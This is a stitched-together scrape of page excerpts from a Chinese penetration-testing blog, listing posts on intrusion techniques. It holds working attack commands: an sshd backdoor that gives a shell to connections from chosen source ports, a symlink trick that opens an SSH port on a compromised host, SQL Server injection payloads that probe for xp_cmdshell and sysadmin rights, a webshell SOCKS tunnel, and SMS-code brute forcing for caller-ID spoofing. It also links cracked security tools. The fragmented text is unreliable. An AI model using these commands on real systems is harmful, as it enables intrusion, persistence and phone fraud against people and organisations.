fuzzzz.net
任意伪造号码拨打电话 – SudoHac's BLoG.
http://fuzzzz.net/pentest/242.html
你的位置 SudoHac's BLoG. 转载请注明 SudoHac's BLoG. 上一篇 IBM appscan 9.0破解版分享. Burpsuite pro v1.5.18 破解版. 关注安全 加友链 www.mrliangqi.com. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
fuzzzz.net
SudoHac's BLoG.为了梦想 Fighting !-Page 5
http://fuzzzz.net/page/5
SudoHac's BLoG.为了梦想 Fighting! 作者 Chora 漏洞文件app/buyer groupbuy.app.php function exit group() { $id = empty($ GET['id'])? 0 : $ GET['id']; /. Http:/ www.wooyun.org/bugs/wooyun-2013-026915 (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session . Burpsuite pro v1.5.18 破解版. Siteserver 3.6.3版SQL注入漏洞. 作者 10457793 siteserver 3.6.3版本 SQL注入漏洞。 扫描siteserver 3.6.3版本目录结构,获得URL如下 http:/ www.domain.gov.cn/siteserver/. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
fuzzzz.net
Other – SudoHac's BLoG.
http://fuzzzz.net/category/other
你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
fuzzzz.net
SSH渗透技巧 – SudoHac's BLoG.
http://fuzzzz.net/pentest/276.html
你的位置 SudoHac's BLoG. Mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;. Root@localhost ]# cd /usr/sbin [root@localhost sbin]# mv sshd ./bin [root@localhost sbin]# echo '#! Usr/bin/perl' sshd [root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) = / .4A/);' sshd [root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' sshd [root@localhost sbin]# chmod u x sshd [root@localhost sbin]# /etc/init.d/sshd restart. 转载请注明 SudoHac's BLoG. 2016 SudoHac's BLoG.
fuzzzz.net
学习笔记 – SudoHac's BLoG.
http://fuzzzz.net/category/note
今天我们的威胁情报系统显示知名的web漏洞扫描器AWVS 10被爆出一个本地权限提升漏洞,漏洞详情及POC https:/ www.exploit-db.com/exploits/38847/ 漏洞分析 根据作者的描述,问题是出现在AWVS 10 . 写在前面的话 你是否喜欢漂亮妹子 & am. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口. 8212;————————————获取基本信息————. Bash漏洞为什么能够执行 Bash漏洞的原理 BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt.
fuzzzz.net
代码审计 – SudoHac's BLoG.
http://fuzzzz.net/category/audit
最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. 出自 FreebuF.COM 作者 LittleHann 这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。 作者 Chora 漏洞文件app/buyer groupbuy.app.php function exit group() { $id = empty($ GET['id'])? 0 : $ GET['id']; /. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
fuzzzz.net
SudoHac's BLoG.为了梦想 Fighting !-Page 2
http://fuzzzz.net/page/2
SudoHac's BLoG.为了梦想 Fighting! 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口. 8212;————————————获取基本信息————. Bash漏洞为什么能够执行 Bash漏洞的原理 BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 老外的开源应用 https:/ github.com/sensepost/reGeorg 非常方便,不用管操作系统,直接传shell上去,然后本. 看见乌云上有个类似的漏洞 便研究了一下,发现类似的漏洞存在不少 比如这个 SKY网络电话。 首先 注册一个号码,号码可以填写任意你喜欢的手机号 然后输入短信验证码 burp抓包 send to Intruder 把smsCode加入payloa.
fuzzzz.net
SQL Server手工注入-显错注入 – SudoHac's BLoG.
http://fuzzzz.net/pentest/263.html
你的位置 SudoHac's BLoG. 8212;————————————获取基本信息————————————-. And exists (select * from sysobjects) -. And exists (select count(*) from sysobjects) - / 效率更高. Select count(*) from sysobjects-. And 1=(@ servername%2b' '%2bhost name() -. And 1=(Select count(*) FROM master.sysobjects Where xtype = 'X' AND name = 'xp cmdshell') -. And 1=(select count(*) FROM master.sysobjects where name= 'xp regread')-. And 1=quotename(db name() -. And 1=db name() %2b' '-. And 1=(select IS SRVRpreEMEMBER('sysadmin') - / 返回正常为sa.
fuzzzz.net
Web应用漏洞 – SudoHac's BLoG.
http://fuzzzz.net/category/security
前几天vBulletin官方论坛被黑,随后一个叫Coldzer0的小哥在1337day上卖vBulletin 5全版本的RCE 0day,看演示很厉害,指哪打哪。 最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 看见乌云上有个类似的漏洞 便研究了一下,发现类似的漏洞存在不少 比如这个 SKY网络电话。 首先 注册一个号码,号码可以填写任意你喜欢的手机号 然后输入短信验证码 burp抓包 send to Intruder 把smsCode加入payloa. Http:/ www.wooyun.org/bugs/wooyun-2013-026915 (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session . Siteserver 3.6.3版SQL注入漏洞. 2016 SudoHac's BLoG.
fuzzzz.net
利用webshell搭建socks代理 – SudoHac's BLoG.
http://fuzzzz.net/pentest/251.html
你的位置 SudoHac's BLoG. Python reGeorgSocksProxy.py -p 8080 -u http:/ upload.sensepost.net:8080/tunnel/tunnel.jsp. 转载请注明 SudoHac's BLoG. IBM appscan 9.0破解版分享. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.